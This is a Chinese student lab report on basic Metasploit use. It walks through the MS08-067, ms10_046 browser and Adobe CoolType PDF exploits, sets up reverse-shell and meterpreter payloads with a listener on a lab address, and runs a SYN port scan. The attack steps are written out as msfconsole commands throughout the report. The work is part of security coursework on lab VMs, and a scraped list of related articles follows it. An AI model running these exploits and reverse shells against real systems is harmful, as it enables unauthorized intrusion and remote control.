2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

时间:2021-12-12 16:11:28

2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

一.原理与实践说明

1.实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  • 一个主动攻击实践,如ms08-067; (1分)

  • 一个针对浏览器的攻击,如ms11-050;(1分)

  • 一个针对客户端的攻击,如Adobe;(1分)

  • 成功应用任何一个辅助模块。(0.5分)

2.基础问题回答

  • exploit是利用漏洞,将攻击代码传送到靶机上,并对靶机进行一系列控制操作的整个过程。

  • payload就是需要传送到靶机上的攻击代码本身。

  • encode是对攻击代码进行完善,伪装,使其能正常运行并且尽量躲避查杀

实践过程

1.Windows服务渗透攻击——MS08-067安全漏洞

实验步骤

  • 先选择靶机为windows xp sp3

  • 在kali终端中开启msfconsole。

  • 输入命令search ms08_067,会显示出找到的渗透模块,如下图所示(

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用

  • 输入show payloads查看攻击载荷

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷

  • 输入命令show options显示我们需要在攻击前需要设置的数据,如下图

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 输入命令set LHOST 192.168.1.108

  • 输入命令set RHOST 192.168.1.109

  • 使用命令show options再次查看payload状态。

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 输入命令exploit开始攻击,但很不幸,攻击没有成功。

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 我们换一下另一个虚拟机试一下,这台靶机是win2000,ip地址是192.168.1.114,这次很轻松的成功了。

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

2.浏览器渗透攻击--ms10_046(靶机WindowsXP)

实验步骤

  • 输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

  • 输入set payload windows/meterpreter/reverse_tcp

  • 查看要输入的参数show options

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 输入set LHOST 192.168.1.108

  • 开始攻击exploit

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • http://192.168.1.108:80/在靶机winXP中打开

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 查看会话效果如下:

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 输入sessions -i 2即可选择会话,然后就攻击成功

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

3、针对Adobe Reader软件的渗透攻击——adobe_toolbutton

  • 在kali终端中开启msfconsole。

  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

  • 输入命令show options显示我们需要在攻击前需要设置的数据

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 输入命令

set FILENAME 20165317.pdf
set LHOST 192.168.1.108
  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

  • 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

  • 使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。需要输入命令set LHOST和攻击模块里的数据设置为一样的

  • 使用命令exploit开始攻击,但是失败了。

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 最后发现是上一次连接没有断开导致端口被占用,重新监听得到效果如下(14)

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

4.辅助模块应用

开放端口扫描

  • 使用show auxiliary查看可以运用的辅助模块:

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

  • 使用此模块扫描端口use auxiliary/scanner/portscan/syn

  • 使用命令show options set RHOSTS 192.168.1.109(目标)set THREADS 50(线程)exploit

  • 扫描结果如下(16)

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

实践总结与体会

由于时间和身体原因并未完成要求(和其他同学不同的操作),但是在实验的过程中确实体会到了Windows系统的漏洞很多,能被利用的也很多

离实战还缺些什么技术或步骤?

我觉得最大的问题是如何找到并利用新的漏洞。

2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165236 Exp5 MSF基础应用 一. 实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要 ...

  2. 2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165318 Exp5 MSF基础应用 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi:自动化 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165301 Exp5 MSF基础应用 实践原理 1.MSF攻击方法 主动攻击:扫描主机漏洞,进行攻击 攻击浏览器 攻击其他客户端 2.MSF的六个模块 查看 ...

  4. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  5. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

  6. 2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165316 Exp5 MSF基础应用 目录 原理与实践说明 实践原理 实践内容概述 基础问题回答 攻击实例 主动攻击的实践 ms08_067_netapi: ...

  7. 20165214 2018-2019-2 《网络对抗技术》Exp5 MSF基础应用 Week8

    <网络对抗技术>Exp5 MSF基础应用 Week8 一.实验目标与内容 1.实践内容(3.5分) 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体我 ...

  8. 2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165228 Exp5 MSF基础应用 exploit选取 主动攻击:ms17_010_eternalblue(唯一) 浏览器攻击:ms05_054_onlo ...

  9. 20165308『网络对抗技术』Exp5 MSF基础应用

    20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...

随机推荐

  1. 使用Mybatis-Generator自动生成Dao、Model、Mapping代码

    1.所需jar包 mybatis-generator-core-1.3.2.jar mybatis-generator-core-1.3.2.jar 可以去http://mvnrepository.c ...

  2. git&colon; windows git ssh keys生成

    http://blog.csdn.net/lsyz0021/article/details/52064829 当我们使用github或者bitbucket等仓库时我们有可能需要ssh认证,所以需要生成 ...

  3. Burp Suite安装及详细使用教程-Intruder模块详解

    01 介绍 安装要求: Java 的V1.5 + 安装( 推荐使用最新的JRE ), 可从这里免费 http://java.sun.com/j2se/downloads.html Burp Suite ...

  4. maven发布时在不同的环境使用不同的配置文件

    在开发时,不同的环境总会使用到不同的配置.如本地,测试,预发布,发布等环境,像数据库这些都要使用到不同的配置.如果手动改的话肯定会十分的麻烦. 还好maven提供的功能能够帮我们解决这个问题. 我们通 ...

  5. 常用排序算法java实现

    写在前面:纸上得来终觉浅.基本排序算法的思想,可能很多人都说的头头是到,但能说和能写出来,真的还是有很大区别的. 今天整理了一下各种常用排序算法,当然还不全,后面会继续补充.代码中可能有累赘或错误的地 ...

  6. python字符串与数字类型转化

    数字转字符串:str(数字),如str(10) 相反:int(字符串),如int('10') 另外,import string后 用string.atoi('100',base),转换为int,bas ...

  7. MySQL 8&period;0 新增SQL语法对窗口函数和CTE的支持

    尝试了一下MySQL 8.0的部分新特性. 如果用过MSSQL或者是Oracle中的窗口函数(Oracle中叫分析函数), 然后再使用MySQL 8.0之前的时候,就知道需要在使用窗口函数处理逻辑的痛 ...

  8. JVM 字节码(一)字节码规范

    JVM 字节码(一)字节码规范 JVM 学习资源 Java ClassFile 字节码规范(Oracle) Java 虚拟机规范(Java SE 7 中文版) (周志明等译) Java 反编译工具 - ...

  9. mysql五补充部分&colon;SQL逻辑查询语句执行顺序

    一 SELECT语句关键字的定义顺序 SELECT DISTINCT <select_list> FROM <left_table> <join_type> JOI ...

  10. 12 jsp page 指令

    jsp 指令影响由 jsp 页面生成的 servlet 整体结构. jsp page 用来设置整个页面属性, 例如 import 就是引用这些类, 还可以设置 session 等等. <%@ p ...